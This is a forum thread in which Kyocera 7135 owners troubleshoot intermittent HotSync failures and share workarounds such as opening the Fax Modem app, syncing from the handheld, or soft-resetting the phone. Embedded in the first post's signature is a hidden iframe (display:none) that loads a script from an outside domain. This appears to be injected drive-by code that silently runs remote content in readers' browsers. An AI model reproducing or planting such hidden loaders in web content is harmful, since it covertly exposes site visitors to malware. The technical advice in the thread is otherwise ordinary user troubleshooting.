+ Reply to Thread
Page 1 of 2 1 2 LastLast

Hot Sync Sporadic Problem

I did a search for this, but the only place it seemed to come up was for the 6035. I am (trying to) use the USB connector to hotsync my phone. It works sometimes, but sometimes when I try to hotsync it times out and I get no response from the PC. At first, I had the cradle plugged into a hub, and I remembered something about giving it its own USB port, but I'm still having the periodic issues even with its own port. I have the hotsync settings for local USB, and I tried making a custom hotsync setting that would use the USB, but so far I'm still getting only sporadic hotsyncs. Any suggestions? (When it does hotsync, there aren't any failures or anything). Thanks,

Brer:dunno<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ---------------
    The same thing we do every night, Pinky...

Re: Hot Sync Sporadic Problem

Originally posted by BrerLapn
    I did a search for this, but the only place it seemed to come up was for the 6035. I am (trying to) use the USB connector to hotsync my phone. It works sometimes, but sometimes when I try to hotsync it times out and I get no response from the PC. At first, I had the cradle plugged into a hub, and I remembered something about giving it its own USB port, but I'm still having the periodic issues even with its own port. I have the hotsync settings for local USB, and I tried making a custom hotsync setting that would use the USB, but so far I'm still getting only sporadic hotsyncs. Any suggestions? (When it does hotsync, there aren't any failures or anything). Thanks,

Brer:dunno
    I've had this same problem. I haven't fixed it, only found a workaround. When I put the phone into the cradle, I start a fax/modem session, then push the hotsync button. Only then will my pc start a hotsync.

Me too

I'm having this problem way too frequently. You guys still experiencing this?

Anybody else care to speculate on this? It's a PITA!! I spent at least half an hour today before I got the hotsync to work--and really didn't do anything different!

Beth

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

HOTSYNC

What settings do you have on your hotsync software.

I have mine running on a hub without every having and error.

I have mine set to usb local and also network. I use usb without error when in office and when on the road i can use network to sync.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Re: Me too

Originally posted by lurkingforinfo
    I'm having this problem way too frequently. You guys still experiencing this?

Anybody else care to speculate on this? It's a PITA!! I spent at least half an hour today before I got the hotsync to work--and really didn't do anything different!

Beth
    I'm still having to use the workaround I described above. It is a PITA, but a small price to pay for use of the great 7135.

I Hot Sychd this morning and all was well. When I tried to synch this afternoon I get a message on my 7135 that says "this feature is not available when the port is in use" I've called Kyocera, Palm and Gateway with no fix. Any ideas?????

I am having this same "this feature is not available when the port is in use" problem.

I can go into the palm and select the hotsync "program" and then it works fine ... this is a workaround but I am confused.

Did anyone ever find a solution?

After some time with Kyocera this is a "bug," they don't quite know how to fix yet. Other than to say it is not happening with a USB connection. I was using my serial connecting thinking it would be more stable, but apparently not.

The work around for now is to sync directly from the palm and not use the cradle button. The Kyocera rep did say she would research it further and email me if she found anything out. <shrug> If she does I'll post here.

Having too much fun with the 7135.

Terri

message quote: from other forum:

This feature is not available when the port is in use
    Thanks for the work-around, Alti, because I've been battling this all day. I even unistalled, reinstalled, but didn't think to try a HS from the palm itself. Well, I wasn't going to go through this hassle each time I want to HS and was getting quite frustrated. I'm using a direct com port connection and it works just fine sometimes and then other times I get the error message of "This feature is not available when the port is in use."

I did learn do NOT bother calling Palm, as they're not supporting the Smartphone without a $25.00 charge. Oh, thanks! So, now I've been on hold with Kyocera for 15 mins. If I find the fix I'll post it here.

www.innovativeoffice.net

I was going to make some suggestions...then realized too many.

I recommend that one of you having problems should list all of your settings, so that everyone can get on the same page. Equipment used would be helpful, too.

May all your sync problems go away and never return...wish for the day.

Found Fix!

I found a reference here:

http://www.risingroad.com/symptoms/symptom0174.html

I went to my network page, but I did not have a connection. So I connected to VZW Quick 2 Net (14.4 kbps), and then I disconnected it.

That fixed the problem. I can now hotsync from the cradle again.

Never Forget 9/11/01 kerryclair's Avatar
    >>I am having this same "this feature is not available when the port is in use" problem.<<

Me too!!
    3 of every 4 attempts to hotsynch using the button gave me this same error. It was making me crazy. I found the same solution you did:

>>can go to the palm and select the hotsync "program" and then it works fine<<

I click on Hotsync from the palm itself and then click on the hotsync icon and it goes fine every time.

It took me a while to realize that the hotsync logo was clickable!!!

Smile Hotsync cradle button problem solved

Anyone with a Kyocera 7135 who is having trouble using the cradle hotsync button: I just had a 1-min. conversation with Kyocera support and fixed the problem (apparently). All you have to do is open the Fax Modem application that comes on the phone, wait for it to say "ready to send", then just hit your Home key (exit the Fax Modem application without doing anything further), back to main menu. Do this first with the phone off the cradle, then with the phone on the cradle. What this does is it clears the port and enables you to use hotsync via the cradle button. I am using the serial connection. I just turned the phone off & on, and exited and restarted Hotsync Mgr. to check, and it works fine.

Good post Kycerauser999, you might post that one in a FAQ thread as well. BTW welcome to the forum.
    mg
    Luck is where opportunity meets preparation.

a fix! thank you

this has been driving me nuts. it correlated to my move from W98 > XP recently, and i thought it was that.

thanks so much for posting this,

Re: Hotsync cradle button problem solved

Originally posted by kycerauser999
    Anyone with a Kyocera 7135 who is having trouble using the cradle hotsync button: I just had a 1-min. conversation with Kyocera support and fixed the problem (apparently). All you have to do is open the Fax Modem application that comes on the phone, wait for it to say "ready to send", then just hit your Home key (exit the Fax Modem application without doing anything further), back to main menu. Do this first with the phone off the cradle, then with the phone on the cradle. What this does is it clears the port and enables you to use hotsync via the cradle button. I am using the serial connection. I just turned the phone off & on, and exited and restarted Hotsync Mgr. to check, and it works fine.
    The other fix they gave me once was to go to the phone, press 111111 (1 - 6 times), scroll down and select options. Then choose "service interface" and then click on "reset". This will soft reset the 7135, but when I did it the button on the cradle worked again.

I too have had intermittent non-hotsyncs. During attempts I have had messages (on my Mac G4 running OS 10.3.2) saying: "Conduit Manager" "File is locked". After a soft reset on the 7135 & a restart on the G3 all is syncing but prior to that I had typed contacts & date book entrys on the desktop that didn't even show up again! On the older Kyocera 63**? model I had to turn off the "Beam" to sync. I don't think it has an on-off on the 7135.

Just for clarification - this happens with USB, in addition to the Serial port. Again, just launch the HotSync from your Palm menu (zLauncher for me), and it works fine. Still haven't figured out the condition that causes it on this end.....

Thumbs up hot sync problem

Thanks for the fix! I have lurked here for a few weeks and learned much from so many. When the hot sync problem happened to me and I found the answer so quickly, I was moved to post my gratitude!

I have had more hot sync problems with the message: "CONDUIT MANAGER"-"Volume is locked" when connected to the Palm Desktop. Some items do sync. My computer Doc says I need to re-install Palm 4.1 so I'm trying to get a download (& permission from Palm) to do it for a re-install on the deskstop after removing the old. Does anyone else have messages from the CONDUIT MANAGER or Desktop saying "FILE (or) VOLUME IS LOCKED"???

My boss has had this problem from the beginning: sporadic recognition for hotsync. The error that he gets is "USB device not recognized."

None of the above fixes are work for him. The only fix we have found is to restart the computer.

Any ideas?
    Nicky